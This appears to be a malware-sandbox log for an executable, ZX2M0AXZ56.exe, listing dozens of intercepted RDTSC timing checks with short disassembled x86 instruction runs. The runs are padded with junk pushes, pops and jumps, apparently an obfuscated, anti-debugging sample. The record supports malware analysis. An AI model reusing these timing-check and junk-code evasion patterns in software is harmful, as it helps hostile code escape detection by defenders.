Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6848E8 second address: 6848EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6848EC second address: 684927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F3B34C1F674h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jo 00007F3B34C1F66Eh 0x00000019 push eax 0x0000001a jc 00007F3B34C1F666h 0x00000020 pop eax 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007F3B34C1F668h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684A9A second address: 684ADD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B34E245F8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 6810A91Eh 0x00000013 mov dword ptr [ebp+122D36DAh], ebx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d jns 00007F3B34E24606h 0x00000023 push 00000003h 0x00000025 push ecx 0x00000026 stc 0x00000027 pop esi 0x00000028 push BE1E18A6h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684ADD second address: 684AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684AE3 second address: 684B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 01E1E75Ah 0x00000010 lea ebx, dword ptr [ebp+1244F793h] 0x00000016 mov dword ptr [ebp+122DB9CDh], ecx 0x0000001c push eax 0x0000001d jnp 00007F3B34E245FEh 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684BDC second address: 684C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5663C54Fh 0x00000010 lea ebx, dword ptr [ebp+1244F79Eh] 0x00000016 sub dword ptr [ebp+122D3093h], edx 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F3B34C1F66Eh 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007F3B34C1F673h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F3B34C1F66Fh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A6738 second address: 6A673C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A673C second address: 6A6742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4648 second address: 6A464D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A464D second address: 6A465E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F3B34C1F666h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A47E9 second address: 6A47EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A47EF second address: 6A47FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F3B34C1F666h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A47FE second address: 6A4802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4802 second address: 6A4824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B34C1F679h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4824 second address: 6A482A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A482A second address: 6A4833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4833 second address: 6A484B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34E24604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4ADF second address: 6A4AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4AE7 second address: 6A4AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4C55 second address: 6A4C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3B34C1F66Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4EE4 second address: 6A4EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4EE8 second address: 6A4EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4EF0 second address: 6A4EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4EF5 second address: 6A4EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A4EFB second address: 6A4F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A5199 second address: 6A51AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F3B34C1F666h 0x0000000d ja 00007F3B34C1F666h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A51AC second address: 6A51C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B34E245F6h 0x00000008 jbe 00007F3B34E245F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A51C2 second address: 6A51C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A51C8 second address: 6A51CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A5457 second address: 6A5487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F675h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B34C1F673h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A5487 second address: 6A54CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F3B34E24603h 0x00000011 jmp 00007F3B34E24607h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A54CE second address: 6A54D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3B34C1F666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A577A second address: 6A577E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A577E second address: 6A5782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A5782 second address: 6A578E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3B34E245F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A578E second address: 6A5794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A5794 second address: 6A57A7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B34E245F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A57A7 second address: 6A57AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A57AE second address: 6A57B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 69B136 second address: 69B16C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3B34C1F678h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B34C1F678h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A6043 second address: 6A6056 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3B34E245FAh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A61A1 second address: 6A61BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34C1F678h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6A65AF second address: 6A65C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 66C0C7 second address: 66C0E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3B34C1F674h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 66C0E5 second address: 66C0F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 66C0F1 second address: 66C0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 66C0F5 second address: 66C0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6AC674 second address: 6AC679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6AC679 second address: 6AC67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 67B599 second address: 67B5A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F3B34C1F666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6BCA second address: 6B6BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F3B34E245F8h 0x0000000b popad 0x0000000c push eax 0x0000000d jne 00007F3B34E245FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6BE9 second address: 6B6BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6BEF second address: 6B6BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6173 second address: 6B6179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6179 second address: 6B6193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F3B34E245F6h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F3B34E245F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6193 second address: 6B6197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6197 second address: 6B61A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B61A1 second address: 6B61AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B61AB second address: 6B61B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B61B1 second address: 6B61DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F3B34C1F66Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B64D0 second address: 6B64FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34E24606h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 jo 00007F3B34E245FEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B68EE second address: 6B6900 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F3B34C1F666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6900 second address: 6B6906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6906 second address: 6B6926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3B34C1F66Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6926 second address: 6B692C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B692C second address: 6B6930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B6A85 second address: 6B6A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7A7A second address: 6B7ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 1E4233EFh 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F3B34C1F668h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jl 00007F3B34C1F66Ch 0x00000031 and esi, dword ptr [ebp+122D398Eh] 0x00000037 call 00007F3B34C1F669h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7ACC second address: 6B7AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F3B34E2460Bh 0x0000000c jmp 00007F3B34E24605h 0x00000011 popad 0x00000012 push eax 0x00000013 jbe 00007F3B34E24602h 0x00000019 jo 00007F3B34E245FCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7AFD second address: 6B7B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B34C1F66Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7B16 second address: 6B7B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B34E245FBh 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7D72 second address: 6B7D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7F6D second address: 6B7F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B7F71 second address: 6B7F98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3B34C1F677h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d js 00007F3B34C1F66Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B8A66 second address: 6B8A70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B34E245F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B8C78 second address: 6B8C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B8C7C second address: 6B8C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B9C98 second address: 6B9C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B9B19 second address: 6B9B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3B34E245FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6B9C9E second address: 6B9CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BAC5C second address: 6BAC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BAC60 second address: 6BAC66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BB397 second address: 6BB39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BE7BA second address: 6BE818 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3B34C1F673h 0x0000000f pushad 0x00000010 jmp 00007F3B34C1F66Fh 0x00000015 jmp 00007F3B34C1F677h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F3B34C1F674h 0x00000021 popad 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BD476 second address: 6BD47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BD47A second address: 6BD480 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BD480 second address: 6BD4AA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B34E245FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3B34E24605h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BEE3B second address: 6BEE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
